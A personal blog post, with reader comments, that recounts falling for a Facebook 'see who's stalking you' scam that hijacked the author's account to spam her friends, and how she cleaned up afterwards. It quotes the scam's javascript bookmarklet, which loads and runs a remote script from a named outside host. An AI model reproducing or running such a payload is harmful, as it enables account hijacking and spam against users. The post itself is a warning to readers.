It wasn’t how I planned to spend a Sunday afternoon.
I saw a “see who’s stalking you” genre post on a friend’s page and thought, “hmmm, is this still around?” A quick Google search revealed SEO-focused stories at Gawker (and other sites) … where the author shows you ways to legitimately see who has most recently viewed (“stalked”) your profile.
But I did not see any new (that is, within the past few days) posts, so I thought I would check it out. Carefully, of course! Curiosity, in this case, bit into my Sunday afternoon. But I’m sharing my experience (and lessons learned) so that you can safely exercise your curiosity!
See Who’s Stalking You
First step: I saw this message (names have been redacted to protect the innocent!)

I know that this isn’t possible.
You know it’s not possible.
But I thought (naively, as it turns out) that I would actually have to authorize something before anything “bad” could happen. So I clicked the link because it went to a Facebook page (which has subsequently been deleted, once assumes by Facebook):
http://www.facebook.com/pages/Check-who-views-your-profile/172721866119962
This single act legitimizes this operation:

The content made me go “huh?” (while I laughed at the spelling – “hotest”). “But, it’s a legitimate app,” I thought. “So let’s keep exploring.”
OK, there’s a bunch of javascript. Where does it go? I pulled the URL out of the code block and tested it — it went to a page that had a link to the js file (be careful – that page still exists). Here’s an example:
javascript:(function()
{_ccscr=document.createElement(‘script’);
_ccscr.type=’text/javascript’;_
ccscr.src=’http://bdatero.info/y.js?’+(Math.random());
document.getElementsByTagName(‘head’)[0].
appendChild(_ccscr);})();
So I thought, OK, I’ll take the next step, and paste the javascript into Chrome. That act yielded this page:

I went no further. To recap:
- I did not “like” the Facebook page that contained the spam
- I did not click anything in the “Facebook Profile Viewer”
Despite my lack of overt authorization, I unwittingly gave this application “permission” to spam my friends.

The spamming came from javascript that looked something like this (txt file).
Recovering From A Mistake
The first thing I did was head over to applications to de-authorize this one (account -> privacy -> applications is at the bottom left corner). That’s when I learned that it wasn’t a real application — because it wasn’t on the app list.
Now comes the hard part: reparations.
I went to my “recently interacted” friends list (the default view when you click “edit friends” — if there is any other way to see your entire friends list, please tell me).
One-at-a-time, open friend in a new window and delete my post, if it exists.
After going through this group, I began working my way through my entire friends list … all the while, answering Tweets and FB posts advising me that I’d been hacked. Which was kinda-sorta true.
My post did not exist on every friend’s wall; it wasn’t even on every “recently interacted” friends list wall. I stopped counting at 15, but my guess is that fewer than 50 (probably a lot fewer than 50) friends were hit with the spam. One of them was, unfortunately, my sister, who also clicked. :-/
But along the way, I discovered that this thing — virus or what-have-you — is both widespread and is taking more than one form:


One of them used tiny.url in the spam; that link was terminated:

Notes To Facebook
Given how many of these apps there are, and how easy it was to hijack my account, Facebook security must have a hole in it large enough to drive an 18-wheeler through. Plus, how in the world is someone able to paste javascript into a form text box an iframe on a Facebook page?? And if those aren’t legitimate Facebook pages, how do they have Facebook URLS?
Here’s another example of a Facebook page with the javascript spam code in-page:

Dear Facebook, there’s a reason that WordPress.com doesn’t allow javascript on the site. You should take a page from their book … but not only should it not be possible to embed javascript in a Facebook page … Facebook should not be responding to commands that are executed via external javascript!
Moreover, I found it fascinating that when I was not logged into Facebook, Facebook warned me about every one of the spam links, even the one (above) that goes to a Facebook page. But when I was logged in, Facebook gave me no warning about the “Hotest” page.
Yes, I know the dangers of javascript … and because I know the dangers, and was still lulled into believing I could manage the risk, I feel a lot more charitable towards anyone who falls for the scam.
What I don’t “get” is what the spammers get out of this …. there must be something in the “surveys” that leads to a pot of gold.
12 replies on “Anatomy of a Facebook Spam: See Who’s Stalking You”
[…] Anatomy of a Facebook Spam: See Who’s Stalking You (wiredpen.com) […]
Hello there,
I am an American. I want to Put in place an Animation Studio in India. At present i’m searching for animators. I preferred India because it is more inexpensive as compared to U.S. I really want to learn the measures for starting off a organization in India, particularly an animation studio.
Can you fellas please help me out?
Opps! Had the wrong name of the author in my previous post. Sorry Kathy!
Kevin, Just had the same day you had here. Ack* And I was being so careful. Thanks for reviewing just how easy I was hoodwinked. I feel a little better now.
Ack! I’m sorry, Kevin – I don’t know how I missed you! I tried to work through everyone and delete it.
I’ve downloaded all the available files from careget.info (no index.html file so the server serves up a list of all the files) and reported the site to http://domainsbyproxy.com which is the domain registrar as well as http://namecheap.com which is the hosting company. I doubt I hear back from them, but if I do …
I thought it was odd you had posted on my FB wall. Luckily, I’m slow to respond and didn’t try to see it until today when it said “application error – this content is not available,” thankfully!
You guys are funny. :-)
One reason you didn’t find it on mine is I kill these messages asap. :)
[…] Anatomy of a Facebook Spam: See Who’s Stalking You (wiredpen.com) […]
Glad I could “help” with your experiment! :)
I got your little message on my wall, but I just marked it as spam, knowing you’d be soon well aware of it.
Hope that creepy EX leaves you alone, Kathy!